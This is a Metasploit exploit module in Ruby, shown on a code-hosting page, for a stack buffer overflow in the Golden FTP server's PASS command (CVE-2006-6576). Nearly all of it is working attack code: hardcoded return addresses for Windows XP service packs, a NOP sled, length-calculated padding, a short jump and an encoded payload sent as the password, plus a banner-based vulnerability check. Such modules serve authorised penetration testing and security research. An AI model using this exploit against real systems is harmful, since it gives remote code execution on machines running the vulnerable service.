Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'GoldenFTP PASS Stack Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a vulnerability in the Golden FTP service, using the PASS
16
        command to cause a buffer overflow.  Please note that in order trigger the vulnerable
17
        code, the victim machine must have the "Show new connections" setting enabled.  By
18
        default, this option is unchecked.
19
      },
20
      'Author'         =>
21
        [
22
          'Craig Freyman',  #Initial poc on exploit-db with iglesiasgg
23
          'bannedit',  #Initial msf module
24
          'Joff Thyer <jsthyer[at]gmail.com>',  #Improved msf version
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          [ 'CVE', '2006-6576'],
30
          [ 'OSVDB', '35951'],
31
          [ 'BID', '45957'],
32
          [ 'EDB', '16036'],
33
        ],
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'seh',
37
        },
38
      'Privileged'     => false,
39
      'Payload'        =>
40
        {
41
          'Space'    => 440,
42
          'BadChars' => "\x00\x0a\x0d",
43
        },
44
      'Platform'       => ['win'],
45
      'Targets'        =>
46
        [
47
          [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ],     #JMP ESI USER32.dll
48
          [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ],     #JMP ESI USER32.dll
49
          [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ]  #JMP ESI kernel32.dll
50
        ],
51
      'DisclosureDate' => '2011-01-23'))
52
  end
53

54
  def check
55
    connect
56
    disconnect
57
    vprint_status("FTP Banner: #{banner}".strip)
58
    if banner =~ /Golden FTP Server ready v(4\.\d{2})/ and $1 == "4.70"
59
      return Exploit::CheckCode::Appears
60
    else
61
      return Exploit::CheckCode::Safe
62
    end
63
  end
64

65
  def exploit
66
    shortjmp = make_nops(3) + "\xeb\x20"
67
    nopsled = make_nops(1) * 60
68
    srciplen = Rex::Socket.source_address.length
69
    padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))
70

71
    sploit = nopsled
72
    sploit << payload.encoded
73
    sploit << padding
74
    sploit << [target.ret].pack('V')
75

76
    print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
77

78
    connect
79
    raw_send(shortjmp + "\n")
80
    send_user(datastore['FTPUSER'])
81
    send_cmd(['PASS', sploit], false)
82
    select(nil,nil,nil,2)
83
    handler
84
    disconnect
85
  end
86
end
87

88